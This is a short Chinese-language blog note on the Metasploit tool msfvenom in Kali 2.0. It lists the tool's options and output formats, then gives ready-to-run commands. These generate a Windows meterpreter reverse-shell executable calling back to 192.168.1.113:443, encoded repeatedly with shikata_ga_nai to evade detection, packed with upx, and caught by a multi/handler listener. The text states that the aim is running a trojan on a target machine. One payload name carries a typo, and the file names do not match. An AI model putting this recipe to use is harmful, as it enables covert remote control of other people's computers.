在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenom,所以该博文记录一些关于msfvenom使用技巧。
:>>>
msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线.
开启:postgresql
root@kali:~# service postgresql start
命令:
root# msfvenom -h
部分参数:>>>
-p 选择一个载荷[payload],或者说一个模块吧。
-l 载荷列表
-f 生成的文件格式
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
-h 帮助
-f exe 生成EXE格式
LHOST,LPORT 监听上线的主机IP和端口
文件格式:>>>
不同的平台需要的不同,来看看支持生成的格式
root@kali:~# msfvenom --help-formats
Error: Executable formats
asp, aspx, aspx-exe, dll, elf, elf-so,
exe, exe-only, exe-service, exe-small, hta-psh,
loop-vbs, macho, msi, msi-nouac, osx-app, psh,
psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, war
Transform formats
bash, c, csharp, dw, dword, hex, java, js_be, js_le,
num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript
命令:>>>
root# msfvenom -p windows/meterpreter/reverse_tcp -o
命令: >>>
root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.1.113 LPORT=443 -f exe > abc.exe
upx -5 /root/Desktop/acn.exe
命令:>>>
root # msfconsole
命令: >>>
msf > use exploit/multi/handler
Msf exploit(handler) > set payload windows/meterpreter/reverset_tcp
[http://www.jianshu.com/p/8d3f94390eab]